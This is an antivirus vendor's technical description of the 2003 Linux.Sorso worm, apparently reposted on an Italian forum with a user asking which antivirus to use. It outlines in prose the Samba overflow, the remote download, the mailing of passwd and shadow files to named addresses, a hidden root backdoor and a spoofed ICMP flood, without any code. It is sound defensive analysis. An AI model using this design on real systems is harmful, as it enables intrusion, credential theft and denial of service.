________________________________________
Linux.Sorso
Discovered on: July 02, 2003
Last Updated on: July 30, 2003 07:05:26 PM
Linux.Sorso is a worm that replicates using a Samba buffer overflow exploit. The worm targets vulnerable installations of the Samba server version 2.2.8a and earlier, version 2.0.10 and earlier, and Samba-TNG version 0.3.2 and earlier. The worm also contains code for a backdoor and a Distributed Denial of Service (DDoS) attack and only affects Linux running on Intel x86 platforms.
Also Known As: Worm.Linux.Sorso.a, Backdoor.Linux.Sorso (AVP)
Type: Zoo Worm
Systems Affected: Linux
Systems Not Affected: Windows 3.x, Windows 95, Windows 98, Windows NT, Windows 2000, Windows XP, Windows Me, Microsoft IIS, Macintosh, OS/2, UNIX
protection
# Virus Definitions (Intelligent Updater) *
July 03, 2003
# Virus Definitions (LiveUpdate™) **
July 09, 2003
*
Intelligent Updater definitions are released daily, but require manual download and installation.
Click here to download manually.
**
LiveUpdate virus definitions are usually released every Wednesday.
Click here for instructions on using LiveUpdate.
technical details
When Linux.Sorso is executed, it performs the following actions:
1. Tries to establish an anonymous SMB session with a Samba server.
2. Sends a TRANS2_OPEN2 request with invalid parameters containing exploit code.
NOTE: The worm uses a Linux shell code exploit, which runs only on Intel x86 platforms.
3. Sends a shell command sequence to the remote shell, which causes the server to download the files from http://www.jx263.com/.
4. Extracts the downloaded files to /usr/lib/.lib and starts a script called start.sh. This requires the presence of the shell command /bin/sh, wget, and tar in the PATH to properly execute.
5. Adds several cron jobs to be executed. These jobs include an exploit program to spread itself, a hijacked version of http daemon, a hijacked ps command, a backdoor, and a DDoS program.
6. Mails the server's IP address, with the /etc/hosts, /etc/passwd, and /etc/shadow files, to hyukie54@163.com and nihao16897888@21cn.com.
7. Scans random class C-sized networks for Samba hosts and tries to exploit each one found.
8. Replaces the existing http daemon with a hijacked version, allowing Web access to any file on the machine.
9. Hides running processes, which the worm created, using the hijacked ps command.
10. Replaces /sbin/klogd with a backdoor program. Upon receiving an ICMP packet of a specific size, the backdoor program binds to a fixed TCP port and provides a shell running as root.
11. Generates a list of possible IPs on a random class C-sized network once a day and adds them to a file. The DDoS program goes through every IP address in the file and sends an ICMP request to that particular IP, using a spoofed source address. As a result, all the ICMP echo response packets go to the spoofed IP address and create an ICMP DDOS attack. The spoofed source IP address is www.rising.com.cn.
removal instructions
Once Linux.Sorso attacks a computer, it is difficult to determine what else the computer has been exposed to. In most cases, changes other than those made by the threat will not have occurred. However, the author of the threat may have been able to use the threat to access the computer to make changes to it. Unless you can be absolutely sure that malicious activity has not been performed on the computer, we recommend completely re-installing the operating system.
________________________________________
mi sa che devo installarmi qualche antivirus... cosa mi consigliate?
Rispondi quotando
